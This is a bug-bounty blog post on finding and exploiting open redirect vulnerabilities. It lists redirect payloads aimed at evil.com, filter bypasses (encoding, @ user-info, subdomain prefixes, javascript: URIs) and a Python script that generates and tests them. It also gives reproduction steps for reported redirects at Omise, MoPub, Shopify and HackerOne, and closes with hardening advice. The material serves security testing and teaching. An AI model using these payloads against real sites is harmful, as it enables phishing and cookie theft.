Day 5: Mastering Open Redirects — Essential Tricks & Techniques Based on Personal Experience and Valuable POCs
[ In collaboration with Sunil Kumawat (LinkedIn | Twitter)]
Hey geeks, Abhijeet Kumawat (Twitter) here with one more write-up on tricks & tips to detect Open Redirect vulnerabilities.
An Open Redirect vulnerability allows an attacker to send users to an untrusted website of the attacker's choice. It typically arises when the application takes a URL from a request parameter (or, as one of the POCs below shows, from a request header) and redirects to it without checking where it points. The primary danger lies in phishing: the link the victim clicks starts with a domain they trust, so the malicious landing page inherits that trust. Open redirects are also routinely chained with other flaws, for example to leak OAuth authorization codes through a redirect_uri check that only validates the host.
Open Redirect vulnerabilities can be found in various parts of a web application, including:
Login Pages: redirecting users to their intended destination after login (parameters such as next, return_to or redirect_uri).
Error Pages: redirecting users to error-specific pages.
Parameter Handling: URLs that include redirection parameters for post-transaction navigation (checkout, payment, logout).
Marketing or External Links: redirecting users to promotional or external websites, often through a click-tracking endpoint.
To detect Open Redirect vulnerabilities, follow these steps:
1. Manual Testing: Identify every point in the application where a redirect occurs, including the 302/303/307 responses in your proxy history and client-side redirects performed with JavaScript (location.href) or a meta refresh, which never show up as a 3xx. Modify the URL parameters to see whether the redirect can be pointed at an external domain.
2. Automated Tools: Use web vulnerability scanners that detect open redirects by injecting common payload patterns and checking the Location header of the response.
3. Intercepting Proxies: Use a tool like Burp Suite to intercept requests and modify redirection parameters in real time, observing whether the application redirects to an unintended URL. Redirect to a host you control (Burp Collaborator or your own domain) so that a real callback confirms the redirect rather than guessing from the response body.
Here are some payload examples ranging from basic to advanced techniques used to exploit Open Redirect vulnerabilities:
Basic parameter names:
http://example.com/redirect?url=http://evil.com
http://example.com/redirect?next=http://evil.com
http://example.com/redirect?redirect=http://evil.com
URL Encoding: http://example.com/redirect?url=http%3A%2F%2Fevil.com
Mixed Case Protocols: http://example.com/redirect?url=HtTp://evil.com
Double Slashes (protocol-relative URL): http://example.com/redirect?url=//evil.com
Using @ Symbol (trusted name in the user-info part, real host after the @): http://example.com/redirect?url=http://trusted.com@evil.com
Prefix Manipulation (a subdomain of the attacker's domain): http://example.com/redirect?url=http://trusted.com.evil.com
JavaScript URIs: http://example.com/redirect?url=javascript:alert(document.cookie) (this only executes when the redirect is performed client-side, e.g. by assigning the parameter to location.href; browsers do not run a javascript: URI supplied in an HTTP Location header)
Attackers often use various techniques to bypass defenses put in place to prevent Open Redirect vulnerabilities. Here are some common bypass techniques:
1. Encoding Variants: Using different encodings (URL encoding, double encoding, UTF-8) to slip past simple string checks that run on the raw request. For example, %68%74%74%70%3a%2f%2f is http:// with every byte percent-encoded; the web framework decodes it before the application sees the value, so a rule that looks for a literal http:// in the query string never fires.
2. Protocol Manipulation: Using alternative forms of the scheme, such as HtTp://, the protocol-relative //example.com, or https://, to bypass filters that only look for a literal http:// prefix.
3. Using the @ Symbol: Placing the trusted domain in the user-info part of the URL, as in http://trusted.com@evil.com. Browsers parse this as user name "trusted.com" on host evil.com, so a filter that only checks for the presence of the trusted name is fooled.
4. Adding False URL Prefixes: Inserting the trusted domain name within the URL to fool basic substring or prefix checks. For example, http://trusted.com.evil.com is simply a subdomain of evil.com that the attacker controls.
Here are detailed Proof of Concept (POC) examples illustrating Open Redirect vulnerabilities and their impacts:
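The following script is an added example and is not part of the original write-up. It generates the payload variants and bypasses listed above for a hypothetical endpoint https://trusted.com/redirect?url= and runs each one through three constructed filters: a WAF-style rule that inspects the raw, undecoded query string; an application-level prefix/substring filter of the kind these bypasses target; and a parser-based check that resolves the target the way a browser resolves a Location header. trusted.com, evil.com, the parameter name and all three filters are assumptions made for the illustration.

```python
"""Added example (not from the original write-up): build the bypass variants
listed above and show which filters each one defeats.
trusted.com, evil.com and /redirect?url= are placeholders."""
from urllib.parse import quote, unquote, urljoin, urlsplit

TRUSTED = "trusted.com"
EVIL = "evil.com"
REQUEST_URL = f"https://{TRUSTED}/redirect"


def full_encode(text: str) -> str:
    """Percent-encode every byte: 'http://' -> '%68%74%74%70%3a%2f%2f'."""
    return "".join(f"%{b:02x}" for b in text.encode())


def bypass_payloads(trusted: str = TRUSTED, evil: str = EVIL) -> dict:
    """The variants from the list above, keyed by technique name."""
    return {
        "plain": f"http://{evil}",
        "url_encoded": quote(f"http://{evil}", safe=""),
        "fully_encoded": full_encode(f"http://{evil}"),
        "mixed_case": f"HtTp://{evil}",
        "double_slash": f"//{evil}",
        "userinfo_at": f"http://{trusted}@{evil}",
        "subdomain_prefix": f"http://{trusted}.{evil}",
        "javascript_uri": "javascript:alert(document.cookie)",
    }


def raw_query_rule(raw_query: str) -> bool:
    """WAF-style rule (constructed) on the undecoded query string: block a
    literal absolute or protocol-relative URL. Returns True if allowed."""
    return "//" not in raw_query.lower()


def naive_app_filter(target: str, trusted: str = TRUSTED) -> bool:
    """Typical broken check (constructed) on the decoded parameter: absolute
    URLs are allowed only if they mention the trusted host; anything that
    does not start with http:// or https:// passes untouched."""
    if target.startswith("http://") or target.startswith("https://"):
        return trusted in target
    return True


def resolved_host(request_url: str, target: str) -> tuple:
    """Resolve `target` the way a browser resolves a Location header
    (relative to the request URL) and return (scheme, hostname)."""
    parts = urlsplit(urljoin(request_url, target))
    return parts.scheme.lower(), (parts.hostname or "").lower()


def strict_redirect_check(target: str, trusted: str = TRUSTED,
                          request_url: str = REQUEST_URL) -> bool:
    """Parser-based check: http(s) only, exact trusted host, and no
    backslashes at all, because browsers treat '\\' as '/' in http URLs
    while urljoin does not, so '/\\evil.com' would be judged wrongly."""
    if "\\" in target:
        return False
    scheme, host = resolved_host(request_url, target)
    return scheme in ("http", "https") and host == trusted


def evaluate(request_url: str = REQUEST_URL) -> dict:
    """For each variant: which filters it passes and where a browser lands."""
    report = {}
    for name, payload in bypass_payloads().items():
        raw_query = f"url={payload}"     # as sent on the wire
        decoded = unquote(payload)       # as the framework hands it to the app
        scheme, host = resolved_host(request_url, decoded)
        report[name] = {
            "passes_raw_rule": raw_query_rule(raw_query),
            "passes_app_filter": naive_app_filter(decoded),
            "passes_strict_check": strict_redirect_check(decoded, request_url=request_url),
            "lands_on": host or scheme,  # hostname, or 'javascript' for the URI
        }
    return report


if __name__ == "__main__":
    for name, row in evaluate().items():
        print(f"{name:17} raw={row['passes_raw_rule']!s:5} "
              f"app={row['passes_app_filter']!s:5} "
              f"strict={row['passes_strict_check']!s:5} -> {row['lands_on']}")
```

Running it prints one row per technique: only the two encoded variants get past the raw-query rule (the application sees plain http://evil.com after decoding), the mixed-case, double-slash, @ and subdomain variants and the javascript: URI all get past the application filter, and nothing gets past the parser-based check while a legitimate /account still does. Two caveats: urljoin is not a browser, which is why the strict check refuses backslashes outright instead of trying to model WHATWG parsing; and the safest design, as the OWASP cheat sheet linked at the end recommends, is not to accept a URL at all but a key that the server maps to an allow-listed destination.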
Description: The Omise Dashboard is vulnerable to an Open Redirect if the server receives a crafted X-Forwarded-Host header: the link in the email-confirmation prompt is built from the host in that header.
Steps to Reproduce:
1. Visit https://dashboard.omise.co/signin and sign in with your credentials without verifying your email.
2. After logging in, navigate to https://dashboard.omise.co/test/dashboard.
3. Send the request to Repeater in Burp Suite and add the header X-Forwarded-Host: bing.com below Host: dashboard.omise.co.
4. Open the modified request in the browser and click "here" inside the message prompting email confirmation.
5. You are redirected to the host supplied in the header (bing.com here); an attacker would substitute a domain they control.
Impact: An attacker can redirect users to malicious websites, leading to phishing attacks. Note that the crafted header has to arrive with the victim's request, for example through a front-end proxy that forwards client-supplied X-Forwarded-Host or by poisoning a shared cache; otherwise only the tester's own session is affected.
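As an added illustration, not Omise's code or anything taken from the report, here is the pattern behind that POC: a confirmation link built from X-Forwarded-Host so that it stays correct behind a reverse proxy, next to a hardened version that accepts only hosts the application actually serves. dashboard.example.com, the /confirm-email path and the header dictionaries are constructed for the example.

```python
"""Added example (not Omise's code): a confirmation link built from
X-Forwarded-Host, beside a hardened version. Hosts and headers are
constructed for illustration."""
from urllib.parse import urlsplit

CANONICAL_HOST = "dashboard.example.com"      # placeholder for the real host
SERVED_HOSTS = frozenset({CANONICAL_HOST})     # every host this app answers on


def _first_forwarded(headers: dict) -> str:
    """X-Forwarded-Host may carry a comma-separated list when several
    proxies append to it; the client-supplied value is the first entry."""
    value = headers.get("X-Forwarded-Host") or headers.get("Host") or ""
    return value.split(",")[0].strip()


def vulnerable_confirm_link(headers: dict, path: str = "/confirm-email") -> str:
    """Trusts the forwarded host so links stay correct behind a reverse
    proxy; whoever can put that header on the request now controls where
    the 'here' link in the confirmation prompt points."""
    return f"https://{_first_forwarded(headers)}{path}"


def hardened_confirm_link(headers: dict, path: str = "/confirm-email") -> str:
    """Accept the forwarded host only if it is one we actually serve
    (case-insensitive, port stripped); otherwise use the canonical host.
    Better still, configure the canonical host statically and never read
    it from the request at all."""
    host = urlsplit("//" + _first_forwarded(headers)).hostname or ""
    if host not in SERVED_HOSTS:
        host = CANONICAL_HOST
    return f"https://{host}{path}"


def link_is_poisoned(headers: dict, builder=vulnerable_confirm_link) -> bool:
    """The check a tester runs after injecting the header: does the link
    the page hands back point somewhere we do not serve?"""
    host = urlsplit(builder(headers)).hostname or ""
    return host not in SERVED_HOSTS


if __name__ == "__main__":
    # Constructed request headers: a normal request and the Repeater one.
    normal = {"Host": CANONICAL_HOST}
    poisoned = {"Host": CANONICAL_HOST, "X-Forwarded-Host": "bing.com"}
    for builder in (vulnerable_confirm_link, hardened_confirm_link):
        print(builder.__name__, builder(poisoned),
              "poisoned" if link_is_poisoned(poisoned, builder) else "ok")
```

The vulnerable builder is exactly the convenience that makes the PoC work: the application wants absolute links that survive a proxy, so it believes whatever host the request claims. The hardened builder keeps that convenience for the hosts it knows about and silently falls back to the configured one for anything else, which is also the right behaviour for Host header poisoning of password-reset links.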
Description: MoPub's login page allows URL redirection through the "next" parameter, which can be set to any website, including a javascript: URI that yields XSS.
Steps to Reproduce:
1. Use the URL: https://app.mopub.com/login?next=https://google.com.
2. Change https://google.com to any URL of your choice.
3. Visit the modified URL and log in.
4. You are redirected to the specified site.
Impact: An attacker could use this for phishing, cookie theft and XSS by embedding JavaScript URIs, using URL encoding to obfuscate the malicious value in the link.
Description: Shopify's store login page is vulnerable to an open redirect through the "checkout_url" parameter after user authentication: the parameter value is concatenated onto the store host instead of being validated as a path.
Steps to Reproduce:
1. Use the URL: http://mystore.myshopify.com/account/login?checkout_url=.np
2. Visit the link and log in.
3. You are redirected to https://mystore.myshopify.com.np/, which is not a Shopify domain (anyone can register a name under .com.np).
Impact: Users can be redirected to non-Shopify domains, potentially malicious, leading to phishing and other attacks.
Description: HackerOne normally sends external links through an interstitial warning page. The "return_to" parameter of the "zendesk_session" endpoint lets a link on hackerone.com bounce through a Zendesk account and reach an untrusted site with no such warning.
Steps to Reproduce:
1. Create a custom Zendesk account and put a redirect in its header file: <script>document.location.href = "http://evil.com";</script>.
2. Use the URL: https://hackerone.com/zendesk_session?locale_id=1&return_to=https://support.hackerone.com/ping/redirect_to_account?state=company:/.
3. Users clicking the link are redirected to the untrusted site without any warning.
Impact: Attackers can exploit trusted links to redirect users to malicious sites without warning, leading to phishing attacks.
Open Redirect vulnerabilities, while often rated lower than XSS or SQL injection, still pose a real risk, primarily in phishing and social engineering, and they become far more serious when chained with an authentication or OAuth flow. Developers must validate every value that ends up in a redirect, and the bypasses above show why substring and prefix matching is not enough. The robust patterns are: avoid user-controlled redirect targets altogether; accept only a key that maps to a server-side allow-list of destinations; or, if a path must be accepted, allow only relative paths that start with a single "/" and contain no backslashes, and build any absolute URL from the configured canonical host rather than from request headers.
Open Redirect Cheat Sheet: https://pentester.land/blog/open-redirect-cheatsheet/
Techniques: https://techbrunch.github.io/patt-mkdocs/Open%20Redirect/
OWASP Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html
If you are still reading & find this blog interesting then do follow me on Medium & LinkedIn for more write-ups
Stay tuned for Day 6, where we’ll dive into another vulnerability!